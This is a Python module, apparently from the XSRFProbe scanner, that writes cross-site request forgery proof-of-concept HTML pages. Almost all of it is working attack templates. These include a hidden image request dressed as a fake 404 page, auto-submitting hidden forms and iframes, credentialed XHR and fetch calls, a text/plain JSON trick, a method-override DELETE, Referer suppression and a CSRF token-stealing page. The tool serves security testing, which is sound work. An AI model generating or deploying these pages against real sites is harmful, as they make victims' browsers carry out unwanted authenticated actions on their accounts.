#!/usr/bin/env python3
# -*- coding: utf-8 -*-

# -:-:-:-:-:-:-::-:-:#
#    XSRF Probe     #
# -:-:-:-:-:-:-::-:-:#

# Author: 0xInfection
# This module requires XSRFProbe
# https://github.com/0xInfection/XSRFProbe

import os
import json
import logging
from urllib.parse import urlencode

from xsrfprobe.files.config import OUTPUT_DIR

logger = logging.getLogger("PoCGenerator")

ATTRIBUTION = "<!-- Generated by XSRFProbe (https://github.com/0xInfection/XSRFProbe) -->"


def _sanitize_filename(action: str) -> str:
    if "//" in action:
        name = action.split("//", 1)[1]
    else:
        name = action
    return name.replace("/", "-").replace(":", "").replace("?", "_").strip("-")


def _hidden_inputs(params: dict) -> str:
    lines = []
    for k, v in params.items():
        lines.append(f'      <input type="hidden" name="{k}" value="{v}" />')
    return "\n".join(lines)


def _save_poc(filename: str, content: str) -> str:
    path = os.path.join(OUTPUT_DIR, filename)
    try:
        with open(path, "w", encoding="utf-8") as f:
            f.write(content)
        logger.info("PoC saved: %s", path)
    except Exception as e:
        logger.error("Failed to save PoC %s: %s", path, e)
    return path


# ----------------------------------------------------------------
# P1: GET auto-submit via <img> tag (no interaction)
# ----------------------------------------------------------------
def gen_get_img(action: str, params: dict) -> str:
    qs = urlencode(params)
    full_url = f"{action}?{qs}" if qs else action
    html = f"""<html>
{ATTRIBUTION}
<head><title>CSRF GET PoC</title></head>
<body>
  <h1>404 - Page not found</h1>
  <p>The URL you are requesting is no longer available.</p>
  <img src="{full_url}" style="display:none" />
</body>
</html>"""
    return _save_poc(f"{_sanitize_filename(action)}-get-img.html", html)


# ----------------------------------------------------------------
# P2: GET link (requires click)
# ----------------------------------------------------------------
def gen_get_link(action: str, params: dict) -> str:
    qs = urlencode(params)
    full_url = f"{action}?{qs}" if qs else action
    html = f"""<html>
{ATTRIBUTION}
<head><title>CSRF GET PoC</title></head>
<body>
  <a href="{full_url}">Click here to continue</a>
</body>
</html>"""
    return _save_poc(f"{_sanitize_filename(action)}-get-link.html", html)


# ----------------------------------------------------------------
# P3: POST form auto-submit (no interaction)
# ----------------------------------------------------------------
def gen_post_autosubmit(action: str, params: dict) -> str:
    inputs = _hidden_inputs(params)
    html = f"""<html>
{ATTRIBUTION}
<head><title>CSRF POST PoC</title></head>
<body>
  <script>history.pushState('', '', '/');</script>
  <form id="csrfform" action="{action}" method="POST" enctype="application/x-www-form-urlencoded">
{inputs}
      <input type="submit" value="Submit" />
  </form>
  <script>document.getElementById('csrfform').submit();</script>
</body>
</html>"""
    return _save_poc(f"{_sanitize_filename(action)}-post-auto.html", html)


# ----------------------------------------------------------------
# P4: POST form via hidden iframe (no page navigation)
# ----------------------------------------------------------------
def gen_post_iframe(action: str, params: dict) -> str:
    inputs = _hidden_inputs(params)
    html = f"""<html>
{ATTRIBUTION}
<head><title>CSRF POST PoC</title></head>
<body>
  <iframe style="display:none" name="csrfframe"></iframe>
  <form id="csrfform" action="{action}" method="POST" target="csrfframe"
        enctype="application/x-www-form-urlencoded">
{inputs}
      <input type="submit" value="Submit" />
  </form>
  <script>document.getElementById('csrfform').submit();</script>
</body>
</html>"""
    return _save_poc(f"{_sanitize_filename(action)}-post-iframe.html", html)


# ----------------------------------------------------------------
# P5: POST AJAX/XHR (withCredentials)
# ----------------------------------------------------------------
def gen_post_xhr(action: str, params: dict) -> str:
    body = urlencode(params)
    html = f"""<html>
{ATTRIBUTION}
<head><title>CSRF XHR PoC</title></head>
<body>
  <script>
    var xhr = new XMLHttpRequest();
    xhr.withCredentials = true;
    xhr.open("POST", "{action}", true);
    xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    xhr.send("{body}");
  </script>
</body>
</html>"""
    return _save_poc(f"{_sanitize_filename(action)}-post-xhr.html", html)


# ----------------------------------------------------------------
# P6: JSON via text/plain enctype trick
# ----------------------------------------------------------------
def gen_json_textplain(action: str, params: dict) -> str:
    json_str = json.dumps(params)
    # text/plain enctype sends name=value; we craft so the result is valid JSON
    # name = '{"key":"'  value = '","key2":"val2"}'
    # The = between them produces: {"key":"=","key2":"val2"}
    # To get cleaner JSON, we use a single input with the full payload
    key_part = json_str[:-1]  # everything except closing }
    val_part = "}"
    html = f"""<html>
{ATTRIBUTION}
<head><title>CSRF JSON PoC</title></head>
<body>
  <script>history.pushState('', '', '/');</script>
  <form id="csrfform" action="{action}" method="POST" enctype="text/plain">
      <input type="hidden" name='{key_part}' value='{val_part}' />
      <input type="submit" value="Submit" />
  </form>
  <script>document.getElementById('csrfform').submit();</script>
</body>
</html>"""
    return _save_poc(f"{_sanitize_filename(action)}-json-textplain.html", html)


# ----------------------------------------------------------------
# P7: JSON via XHR (application/json, may trigger CORS preflight)
# ----------------------------------------------------------------
def gen_json_xhr(action: str, params: dict) -> str:
    payload = json.dumps(params)
    html = f"""<html>
{ATTRIBUTION}
<head><title>CSRF JSON XHR PoC</title></head>
<body>
  <script>
    var xhr = new XMLHttpRequest();
    xhr.withCredentials = true;
    xhr.open("POST", "{action}", true);
    xhr.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
    xhr.send('{payload}');
  </script>
</body>
</html>"""
    return _save_poc(f"{_sanitize_filename(action)}-json-xhr.html", html)


# ----------------------------------------------------------------
# P8: Multipart POST via fetch
# ----------------------------------------------------------------
def gen_multipart_fetch(action: str, params: dict) -> str:
    append_lines = "\n".join(
        f"    fd.append('{k}', '{v}');" for k, v in params.items()
    )
    html = f"""<html>
{ATTRIBUTION}
<head><title>CSRF Multipart PoC</title></head>
<body>
  <script>
    var fd = new FormData();
{append_lines}
    fetch("{action}", {{
      method: "POST",
      body: fd,
      credentials: "include",
      mode: "no-cors"
    }});
  </script>
</body>
</html>"""
    return _save_poc(f"{_sanitize_filename(action)}-multipart-fetch.html", html)


# ----------------------------------------------------------------
# P9: Method override PoC (_method hidden field)
# ----------------------------------------------------------------
def gen_method_override(action: str, params: dict, override_method: str = "DELETE") -> str:
    inputs = _hidden_inputs(params)
    html = f"""<html>
{ATTRIBUTION}
<head><title>CSRF Method Override PoC</title></head>
<body>
  <script>history.pushState('', '', '/');</script>
  <form id="csrfform" action="{action}" method="POST" enctype="application/x-www-form-urlencoded">
{inputs}
      <input type="hidden" name="_method" value="{override_method}" />
      <input type="submit" value="Submit" />
  </form>
  <script>document.getElementById('csrfform').submit();</script>
</body>
</html>"""
    return _save_poc(f"{_sanitize_filename(action)}-method-override.html", html)


# ----------------------------------------------------------------
# P10: Referer suppression PoC (wraps a POST form with <meta referrer>)
# ----------------------------------------------------------------
def gen_referer_suppressed(action: str, params: dict) -> str:
    inputs = _hidden_inputs(params)
    html = f"""<html>
{ATTRIBUTION}
<head>
  <title>CSRF Referer Suppression PoC</title>
  <meta name="referrer" content="never" />
</head>
<body>
  <script>history.pushState('', '', '/');</script>
  <form id="csrfform" action="{action}" method="POST" enctype="application/x-www-form-urlencoded">
{inputs}
      <input type="submit" value="Submit" />
  </form>
  <script>document.getElementById('csrfform').submit();</script>
</body>
</html>"""
    return _save_poc(f"{_sanitize_filename(action)}-referer-suppressed.html", html)


# ----------------------------------------------------------------
# P11: Token steal + auto-submit (same-origin only)
# ----------------------------------------------------------------
def gen_token_steal(action: str, token_page_url: str, token_name: str, params: dict) -> str:
    other_params = {k: v for k, v in params.items() if k != token_name}
    extra_fields = "&".join(f"{k}={v}" for k, v in other_params.items())
    html = f"""<html>
{ATTRIBUTION}
<head><title>CSRF Token Steal PoC</title></head>
<body>
  <script>
    function submitWithToken(token) {{
      var xhr = new XMLHttpRequest();
      xhr.withCredentials = true;
      xhr.open("POST", "{action}", true);
      xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
      xhr.send("{token_name}=" + encodeURIComponent(token) + "&{extra_fields}");
    }}

    var xhr = new XMLHttpRequest();
    xhr.responseType = "document";
    xhr.withCredentials = true;
    xhr.open("GET", "{token_page_url}", true);
    xhr.onload = function() {{
      if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {{
        var page = xhr.response;
        var match = page.querySelector('input[name="{token_name}"]');
        if (match) {{
          submitWithToken(match.value);
        }}
      }}
    }};
    xhr.send(null);
  </script>
</body>
</html>"""
    return _save_poc(f"{_sanitize_filename(action)}-token-steal.html", html)


# ----------------------------------------------------------------
# Public API
# ----------------------------------------------------------------
class PoCGenerator:
    def __init__(self, output_dir: str = ""):
        if output_dir:
            global OUTPUT_DIR
            OUTPUT_DIR = output_dir

    def generate(self, vuln_type: str, action: str, method: str,
                 params: dict, **kwargs) -> str:
        """Generate a specific PoC type. Returns file path."""
        generators = {
            "get-img": gen_get_img,
            "get-link": gen_get_link,
            "post-auto": gen_post_autosubmit,
            "post-iframe": gen_post_iframe,
            "post-xhr": gen_post_xhr,
            "json-textplain": gen_json_textplain,
            "json-xhr": gen_json_xhr,
            "multipart-fetch": gen_multipart_fetch,
            "method-override": gen_method_override,
            "referer-suppressed": gen_referer_suppressed,
        }

        gen_fn = generators.get(vuln_type)
        if gen_fn:
            return gen_fn(action, params, **kwargs)

        logger.warning("Unknown PoC type: %s", vuln_type)
        return ""

    def generate_all_variants(self, action: str, method: str, params: dict) -> list[str]:
        """Generate all applicable PoC variants for a given endpoint."""
        paths = []

        if method.upper() == "GET":
            paths.append(gen_get_img(action, params))
            paths.append(gen_get_link(action, params))
        else:
            paths.append(gen_post_autosubmit(action, params))
            paths.append(gen_post_iframe(action, params))
            paths.append(gen_post_xhr(action, params))
            paths.append(gen_json_textplain(action, params))
            paths.append(gen_json_xhr(action, params))
            paths.append(gen_multipart_fetch(action, params))
            paths.append(gen_method_override(action, params))
            paths.append(gen_referer_suppressed(action, params))

        logger.info("Generated %d PoC variants for %s", len(paths), action)
        return paths
